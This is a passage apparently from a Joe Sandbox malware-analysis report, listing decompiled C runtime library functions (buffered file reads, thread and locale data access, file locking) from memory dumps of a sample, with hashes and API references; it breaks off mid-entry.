Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
Instruction ID: bdcb01ec19549c7021fc72594ed2a02fc7510d84b2b58dcd9a80f8d65e62ab0e
Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
Instruction Fuzzy Hash: 0561F0B1D497808FC7209F29A8A0B6AFBE1FB45215F94492ED1C683740D775E84ACF52

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}

0x0040bcc2
0x0040bcca
0x0040bcce
0x0040bcd3
0x0040bcd5
0x0040bcd8
0x0040bcde
0x0040bd01
0x00000000
0x0040bce5
0x0040bce5
0x0040bce7
0x0040bd08
0x0040bd0b
0x0040bd0d
0x0040bd1c
0x0040bd1c
0x0040bd1f
0x0040bd24
0x0040bd29
0x0040bd29
0x0040bd2c
0x0040bd2e
0x00000000
0x0040bd30
0x0040bd30
0x0040bd35
0x0040bd38
0x0040bd3b
0x00000000
0x00000000
0x0040bd3d
0x0040bd40
0x0040bd44
0x0040bd4b
0x0040bd4e
0x0040bd50
0x0040bd5a
0x0040bd52
0x0040bd55
0x0040bd55
0x0040bd61
0x0040bd63
0x0040be53
0x00000000
0x0040bd69
0x0040bd69
0x0040bd69
0x0040bd70
0x0040bdb6
0x0040bdb6
0x0040bdb9
0x0040be24
0x0040be2a
0x0040be2d
0x0040beb8
0x00000000
0x0040bebe
0x0040be33
0x0040be37
0x0040be87
0x0040be87
0x0040be8b
0x0040be95
0x0040be9a
0x0040be9a
0x0040bea2
0x0040beaa
0x0040beab
0x0040beac
0x0040bead
0x0040beae
0x0040bcf9
0x0040bcf9
0x00000000
0x0040bcfe
0x0040be39
0x0040be3c
0x0040be3f
0x0040be44
0x0040be45
0x0040be45
0x0040be45
0x0040be48
0x00000000
0x0040be48
0x0040bdbb
0x0040bdbf
0x0040bde0
0x0040bde5
0x0040bde7
0x0040bde9
0x0040bde9
0x0040bdc1
0x0040bdc8
0x0040bdca
0x0040bdd7
0x0040bdd7
0x0040bdd7
0x0040bdda
0x0040bdcc
0x0040bdce
0x0040bdd1
0x0040bdd1
0x0040bddc
0x0040bddc
0x0040bdeb
0x0040bdee
0x00000000
0x0040bdf4
0x0040bdf4
0x0040bdf5
0x0040bdf9
0x0040bdfe
0x0040bdff
0x0040be00
0x0040be05
0x0040be08
0x0040be0a
0x0040bec6
0x00000000
0x0040bec6
0x0040be10
0x0040be13
0x0040beb4
0x0040beb4
0x0040beb4
0x0040beb4
0x00000000
0x0040beb4
0x0040be19
0x0040be1c
0x0040be1e
0x00000000
0x0040be1e
0x0040bdee
0x0040bd72
0x0040bd75
0x0040bd77
0x00000000
0x00000000
0x0040bd79
0x00000000
0x00000000
0x0040bd7f
0x0040bd81
0x0040bd83
0x0040bd85
0x0040bd85
0x0040bd87
0x0040bd8a
0x0040be5b
0x0040be5d
0x0040be61
0x0040be6a
0x0040be6f
0x0040be6f
0x0040be72
0x0040be77
0x0040be78
0x0040be79
0x0040be7a
0x0040be7b
0x0040be81
0x00000000
0x0040bd90
0x0040bd99
0x0040bd9e
0x0040bda1
0x0040bda3
0x0040bda6
0x0040bda8
0x0040bdab
0x0040bdae
0x0040bdae
0x0040be4b
0x0040be4b
0x0040be4b
0x00000000
0x0040bd69
0x0040bd63
0x0040bd2e
0x0040bd0f
0x0040bd14
0x0040bd14
0x0040bd17
0x0040bd1a
0x00000000
0x00000000
0x00000000
0x0040bd1a
0x0040bce9
0x0040bce9
0x0040bcee
0x0040bcef
0x0040bcf0
0x0040bcf1
0x0040bcf2
0x0040bcf8
0x00000000
0x0040bcf8

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 02DABF29 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 02DABF8B
_memcpy_s.LIBCMT ref: 02DAC000
__fileno.LIBCMT ref: 02DAC060
__read.LIBCMT ref: 02DAC067
__filbuf.LIBCMT ref: 02DAC08B
_memset.LIBCMT ref: 02DAC0D1
_memset.LIBCMT ref: 02DAC0FC

Part of subcall function 02DAC228: __getptd_noexit.LIBCMT ref: 02DAC228

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: ee69eea392e5813a93780f156bb0b8fb86ff0c6cbe404d4eae697f02080a5043
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 4A51B671A00209EFCB208F798864D9EBBB5EF50378F28861BE865963D0D7719E51CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02DAC9A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 02DAC92F
__fileno.LIBCMT ref: 02DAC93D
__fileno.LIBCMT ref: 02DAC949
__fileno.LIBCMT ref: 02DAC955
__fileno.LIBCMT ref: 02DAC965

Part of subcall function 02DAC228: __getptd_noexit.LIBCMT ref: 02DAC228

Strings

'B, xrefs: 02DAC976

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: __fileno$__getptd_noexit__lock_file
String ID: 'B
API String ID: 3755561058-2787509829
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: 52b7e5d7c77c0565c8d8aa52cc4a68bd0db140cf5528536d8a214c4d797b36b1
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: AA018E336206205AC3116B785CA1E2D73A5EF86B72F654756D0709B3D0EB28CD02CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}

0x00414738
0x00414738
0x00414738
0x00414738
0x00414738
0x0041473a
0x0041473f
0x00414749
0x0041474b
0x00414753
0x00414777
0x00414779
0x0041477f
0x00414783
0x00414786
0x00414791
0x00414794
0x0041479b
0x00414755
0x00414755
0x00414759
0x00000000
0x0041475b
0x00414760
0x00414760
0x00414759
0x00414765
0x00414769
0x0041476e
0x00414776

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 02DB499F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02DB49AB

Part of subcall function 02DB099C: __getptd_noexit.LIBCMT ref: 02DB099F
Part of subcall function 02DB099C: __amsg_exit.LIBCMT ref: 02DB09AC

__getptd.LIBCMT ref: 02DB49C2
__amsg_exit.LIBCMT ref: 02DB49D0
__lock.LIBCMT ref: 02DB49E0

Strings

@.B, xrefs: 02DB49ED

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 81b7fb22d6893ac04061332907651a8fea4bc942f8c8cfe80bec43646470f0bc
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: DCF06D31A40714EADF22FB648935B9973A1BF08760F41011EC496A73D2CB74AC01CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02DB4961 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 02DB4973
___removelocaleref.LIBCMT ref: 02DB497E
___freetlocinfo.LIBCMT ref: 02DB4992

Part of subcall function 02DB46F0: ___free_lconv_mon.LIBCMT ref: 02DB4736
Part of subcall function 02DB46F0: ___free_lconv_num.LIBCMT ref: 02DB4757
Part of subcall function 02DB46F0: ___free_lc_time.LIBCMT ref: 02DB47DC

Strings

@.B, xrefs: 02DB4970
@.B, xrefs: 02DB4989

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: @.B$@.B
API String ID: 4212647719-183327057
Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction ID: 19066c3854149dc6d11351dcd2988403bc9998e10596d18cf9673693574875d8
Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction Fuzzy Hash: A3E0DF22911A21D5CE33EA1C78303EA9295AF8A216F1B112EE81AE7347DB244C80C4A4

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}

0x0040c73d
0x0040c690
0x0040c692
0x0040c697
0x0040c69e
0x0040c6a3
0x0040c6a8
0x0040c6aa
0x0040c6c8
0x0040c6ce
0x0040c6d1
0x0040c6d6
0x0040c6dc
0x0040c6df
0x0040c70f
0x0040c70f
0x0040c6e1
0x0040c6e2
0x0040c6e8
0x0040c6eb
0x00000000
0x0040c6ed
0x0040c6ee
0x0040c70b
0x0040c70b
0x0040c6eb
0x0040c714
0x0040c71b
0x0040c71e
0x0040c725
0x0040c72a
0x0040c72a
0x0040c6ac
0x0040c6ac
0x0040c6b3
0x0040c6b4
0x0040c6b6
0x0040c6b7
0x0040c6b8
0x0040c6b9
0x0040c6ba
0x0040c6bb
0x0040c6c3
0x0040c6c3
0x0040c731

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x4971638
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x4971638
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x4971638
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}

0x00413fcc
0x00413fcc
0x00413fcc
0x00413fcc
0x00413fce
0x00413fd3
0x00413fdd
0x00413fdf
0x00413fe7
0x00414008
0x0041400e
0x00414012
0x00414015
0x00414018
0x0041401e
0x00414020
0x00414022
0x00414025
0x0041402b
0x0041402d
0x0041402f
0x00414035
0x00414037
0x00414038
0x0041403d
0x00414035
0x0041402d
0x0041403e
0x00414043
0x00414046
0x0041404c
0x00414050
0x00414050
0x00414056
0x0041405d
0x00413fef
0x00413fef
0x00413fef
0x00413ff4
0x00413ff8
0x00413ffd
0x00414005

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(04971638), ref: 00414050

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 02DB4233 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02DB423F

Part of subcall function 02DB099C: __getptd_noexit.LIBCMT ref: 02DB099F
Part of subcall function 02DB099C: __amsg_exit.LIBCMT ref: 02DB09AC

__amsg_exit.LIBCMT ref: 02DB425F
__lock.LIBCMT ref: 02DB426F
InterlockedDecrement.KERNEL32(?), ref: 02DB428C
InterlockedIncrement.KERNEL32(00422D38), ref: 02DB42B7

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 23fac0f444651f5b50c699f4137f7be4f556b37d727a8b360d11210a3870decc
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 5901C431E01621EBD722EB249824BDEB760FF48724F448015D811A7391CB74AD81EFE9

Uniqueness

Uniqueness Score: -1.00%

Function 02DB1161 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

2, xrefs: 02DB11E2
, xrefs: 02DB11AF
l, xrefs: 02DB1188

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID:
String ID: $2$l
API String ID: 0-3132104027
Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
Instruction ID: b8ba6a7136df4ca29a092609910ba41e2181f99e8f387240dd3971b56fdd3a0a
Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
Instruction Fuzzy Hash: 2341A1348042A9CEDF368B2688B83E87BB2AF05315F1441DAC4AF66391C775CE86CF15

Uniqueness

Uniqueness Score: -1.00%

Function 02DAFCBF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 02DAFCE1
__calloc_crt.LIBCMT ref: 02DAFCFA

Strings

P$B, xrefs: 02DAFD11
`$B, xrefs: 02DAFD33

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

